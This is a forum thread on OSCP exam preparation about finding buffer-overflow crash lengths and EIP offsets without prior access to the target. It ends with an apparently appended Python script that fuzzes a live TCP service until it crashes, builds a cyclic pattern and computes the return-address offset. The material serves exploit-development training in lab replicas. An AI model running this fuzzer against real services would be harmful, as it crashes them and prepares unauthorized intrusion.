Find buffer overflows on a target you want to gain access to

I want to pass my OSCP exam and I am learning with the material I got. I watched the videos and read the PDF, but I have a question about buffer overflows.

In the example in the videos the guy has access to the target system and can therefore control, debug and restart the application. So he can see what length he should send to cause the buffer overflow, where the EIP register is in the sent string, and so on.

But my intention with a buffer overflow is to get access to a system I have not had access to before, isn't it?

So how do I get to know all the relevant data without having access such as debug functions beforehand?

Thanks in advance!


  • You will need some sort of access to the box. You need to have the binary. Either you have the binary and disassemble it, or they have gdb-server and you can debug on the server.

  • The only way to achieve this without access to the physical system, i.e. being logged into it, would be the whole enumeration process. Scan the system, find the application and then replicate the system in a virtual environment. I have completed the OSCP and I had issues with the BoF; rather than pay for additional time in the labs, I managed to find the software version used within the videos and constructed a virtual lab for myself, to ensure that I fully understood the whole process.

    I have mentioned this before in other conversations: when doing the BoF, check out John Hammond's video about OSCP; he makes reference to BoF and what he did to achieve a shell.
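The two comments above describe the same split: the part you can do blind against the live target (enumerate it, then fuzz the service with growing inputs until it stops answering) and the part you need your own replica and a debugger for (read EIP, work out the offset). The following is an added example written for this thread, not code from the OSCP material or from either commenter, and it shows that split in working Python. The `Aa0Aa1…` pattern scheme follows Metasploit's `pattern_create`; `tcp_probe` assumes a line-based service that sends a banner and then reads a command, and `constructed_service` is a constructed stand-in for a real target so the script runs offline.

```python
#!/usr/bin/env python3
"""Black-box half of an OSCP-style BoF workflow (added example, not from the thread).

1. fuzz():           grow the payload against the live service until it stops
                     answering; that length is your starting crash length.
2. cyclic_pattern(): build a non-repeating Aa0Aa1Aa2... pattern of that length
                     and send it to the replica you rebuilt in your own VM.
3. pattern_offset(): turn the EIP value the debugger shows into the byte offset
                     at which the saved return address sits in your buffer.
"""
import socket
import string
import struct

MAX_PATTERN = 26 * 26 * 10 * 3  # 20280 bytes before the Aa0 scheme would repeat


def cyclic_pattern(length):
    """Return `length` bytes of the Metasploit-style Aa0Aa1... pattern."""
    if length > MAX_PATTERN:
        raise ValueError("pattern longer than %d bytes would repeat" % MAX_PATTERN)
    out = bytearray()
    for up in string.ascii_uppercase:
        for lo in string.ascii_lowercase:
            for dg in string.digits:
                out += (up + lo + dg).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(pattern, eip):
    """Offset of the 4 bytes that landed in EIP, or -1 if they are not in the pattern.

    `eip` is the value as the debugger shows it (e.g. 0x39654138) or the raw 4 bytes.
    x86 is little-endian, so EIP = 0x39654138 means the bytes "8Ae9" in the buffer.
    """
    needle = struct.pack("<I", eip) if isinstance(eip, int) else bytes(eip)
    return pattern.find(needle)


def fuzz(send_once, start=100, step=100, limit=5000):
    """Grow the payload until send_once() reports the service stopped answering.

    send_once(payload) must return True while the service still answers and False
    when the connection is refused, reset or times out (the usual signs of a crash).
    Returns the first length that killed the service, or None if it survived `limit`.
    """
    length = start
    while length <= limit:
        if not send_once(b"A" * length):
            return length
        length += step
    return None


def tcp_probe(host, port, prefix=b"", suffix=b"\r\n", timeout=3.0):
    """Build a send_once() for a banner-then-command TCP service (assumption about
    the target). `prefix` is the command whose argument you suspect, e.g. b"USER "."""
    def send_once(payload):
        try:
            with socket.create_connection((host, port), timeout=timeout) as s:
                s.recv(1024)                       # banner (assumed present)
                s.sendall(prefix + payload + suffix)
                return s.recv(1024) != b""         # empty read = peer closed, likely crashed
        except OSError:                            # timeout, refused, reset all derive from OSError
            return False
    return send_once


def constructed_service(crash_at):
    """Constructed stand-in for a real target so the example runs offline.

    It 'dies' once the payload reaches `crash_at` bytes and, once 'debugged', reports
    the 4 payload bytes that overwrote the return address at offset crash_at - 100
    (an arbitrary constructed stack layout, not a real program's).
    """
    ret_offset = crash_at - 100

    def send_once(payload):
        return len(payload) < crash_at

    def eip_after(payload):
        # What a debugger on the replica would show: the saved EIP replaced by
        # payload[ret_offset:ret_offset+4], read as a little-endian dword.
        return struct.unpack("<I", payload[ret_offset:ret_offset + 4])[0]

    return send_once, eip_after


def run_workflow(send_once, eip_after, **fuzz_kw):
    """Fuzz, then pattern, then offset. Returns (crash_len, eip, offset) or None."""
    crash_len = fuzz(send_once, **fuzz_kw)
    if crash_len is None:
        return None
    pattern = cyclic_pattern(crash_len)
    eip = eip_after(pattern)          # on a real replica: read this off the debugger
    return crash_len, eip, pattern_offset(pattern, eip)


if __name__ == "__main__":
    send_once, eip_after = constructed_service(crash_at=2300)
    print(run_workflow(send_once, eip_after))
    # Against a real target: fuzz(tcp_probe(host, port, prefix=b"USER ")),
    # then send cyclic_pattern(crash_len) to your replica and feed the EIP value
    # you read in the debugger to pattern_offset().
```

Two caveats a practitioner should keep in mind. The length `fuzz()` returns is only the first step size at which the service died, so the real overflow threshold lies somewhere between that and the previous step; it is a starting point for the replica, not an exploit parameter. And `pattern_offset()` is only meaningful on a copy of the exact same binary and version, which is why the second comment insists on rebuilding the target in a VM rather than guessing offsets against the live box.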
